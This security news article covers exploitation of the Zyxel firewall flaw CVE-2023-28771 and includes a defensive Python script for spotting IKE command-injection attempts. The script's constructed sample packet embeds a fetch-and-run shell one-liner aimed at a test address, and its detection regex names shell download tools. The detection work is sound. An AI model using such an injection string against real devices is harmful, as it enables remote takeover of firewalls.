The consequences of a vulnerability in Zyxel firewalls are long-lasting. Fortinet warns of a recent spike in DDoS attacks.
The CVE-2023-28771 vulnerability is by now well known in the security world. The Taiwanese manufacturer Zyxel released a patch at the end of April to close it, but many organizations still do not follow the rule of applying security updates immediately. Experts sounded the alarm at the beginning of June, yet twelve weeks after the patch was delivered, Fortinet concluded that little had improved.
Fortinet has observed a spike in DDoS attacks since late May, which researcher Cara Lin attributes to CVE-2023-28771. A peak between June 18 and 25 shows how actively the vulnerability is still being exploited. That is because working exploit code is publicly available: anyone building a botnet can reuse it to recruit vulnerable devices and then launch tailored DDoS attacks from them.
A hole in the wall
More specifically, they take advantage of the command injection the vulnerability allows. They send specially crafted Internet Key Exchange (IKE) packets to the firewall's IKE service on UDP port 500, which processes them without any authentication. A successful injection lets the attacker execute commands on the device, and the firewall itself then becomes part of the malicious botnet.
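One way to spot attempts of this kind in traffic headed for UDP port 500, as an added example that is not code from the original article, from Fortinet or from Zyxel: the script below parses the fixed 28-byte ISAKMP header and flags datagrams whose body contains shell syntax, is mostly printable text, or whose length field does not match the datagram. The sample datagrams are constructed here for illustration, and the assumption that an injection attempt carries readable shell syntax in the packet body is a heuristic, not a signature for this vulnerability.

```python
"""Heuristic inspection of IKE/ISAKMP datagrams (UDP/500) for command-injection
attempts. Added example; not code from the article, Fortinet or Zyxel.

Assumption (a heuristic, not a vulnerability signature): an injection attempt
carries printable shell syntax in the packet body, whereas a legitimate IKE
exchange after the 28-byte header consists of binary TLV payloads.
"""
import re
import struct
from dataclasses import dataclass, field

# Fixed ISAKMP header (RFC 2408 / RFC 7296): initiator SPI, responder SPI,
# next payload, version, exchange type, flags, message ID, total length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
HDR_LEN = ISAKMP_HDR.size  # 28 bytes

# Shell syntax that never appears in well-formed IKE payloads.
SHELL_META = re.compile(rb"[;|`&]|\$\(|\b(?:wget|curl|tftp|chmod|sh)\b")


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)
    exchange_type: int = -1


def inspect_ike(datagram: bytes) -> Verdict:
    """Return a Verdict for one UDP/500 datagram."""
    if len(datagram) < HDR_LEN:
        return Verdict(True, ["datagram shorter than the ISAKMP header"])

    (_i_spi, _r_spi, _next_payload, version, exch_type,
     _flags, _msg_id, length) = ISAKMP_HDR.unpack_from(datagram)
    reasons = []

    major = version >> 4  # 1 = IKEv1 (0x10), 2 = IKEv2 (0x20)
    if major not in (1, 2):
        reasons.append(f"unknown ISAKMP major version {major}")
    if length != len(datagram):
        reasons.append(f"header length {length} != datagram length {len(datagram)}")

    body = datagram[HDR_LEN:]
    match = SHELL_META.search(body)
    if match:
        reasons.append(f"shell syntax in payload: {match.group(0)!r}")
    if body:
        printable = sum(32 <= b < 127 for b in body) / len(body)
        if printable > 0.8:
            reasons.append(f"payload is {printable:.0%} printable text")

    return Verdict(bool(reasons), reasons, exch_type)


def build_ike(version: int, exchange_type: int, body: bytes,
              next_payload: int = 33, flags: int = 0x08) -> bytes:
    """Assemble a datagram with a self-consistent length field (constructed sample)."""
    length = HDR_LEN + len(body)
    return ISAKMP_HDR.pack(b"\x11" * 8, b"\x00" * 8, next_payload, version,
                           exchange_type, flags, 0, length) + body


# Constructed samples, not captured traffic.
# IKEv2 (version 0x20) IKE_SA_INIT (exchange 34) with a minimal binary SA payload.
BENIGN_SA_INIT = build_ike(0x20, 34, b"\x00\x00\x00\x0c\x00\x00\x00\x01\x02\x03\x04\x05")
# IKEv1 (version 0x10) Identity Protection (exchange 2) whose body is a shell
# one-liner instead of a binary payload. 198.51.100.7 is an RFC 5737 test address.
SUSPICIOUS_IKEV1 = build_ike(0x10, 2, b"\x00\x00\x00\x23;wget http://198.51.100.7/x|sh;")
TRUNCATED = b"\x00" * 10


if __name__ == "__main__":
    for name, pkt in [("benign", BENIGN_SA_INIT), ("suspicious", SUSPICIOUS_IKEV1),
                      ("truncated", TRUNCATED)]:
        verdict = inspect_ike(pkt)
        print(f"{name:10s} suspicious={verdict.suspicious} {verdict.reasons}")
```

In practice you would feed `inspect_ike` the UDP payloads pulled from a capture on the firewall's WAN side rather than the constructed samples. Because IKE on UDP/500 is expected traffic on a VPN gateway, the check is payload-based, not port-based. It is deliberately loose: encoded or obfuscated payloads slip past the shell-syntax test, and IKEv1 Vendor ID payloads legitimately carry short ASCII strings, so treat a hit as a trigger for a closer look at the source address rather than as proof of exploitation.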
So we reiterate: if your company uses Zyxel firewalls or VPN devices, update them as soon as possible. If you don't take our word for it, consider the CVSS score of 9.8 the vulnerability has received. In its security advisory, the manufacturer lists which firmware versions are vulnerable and which version you should update your devices to. Where a device does not need to accept IPsec connections from the internet, blocking UDP port 500 on the WAN interface reduces exposure until the update is applied.
Zyxel has made headlines with vulnerabilities in its security appliances more often than it would like; alarming reports also circulated in 2022 and 2021.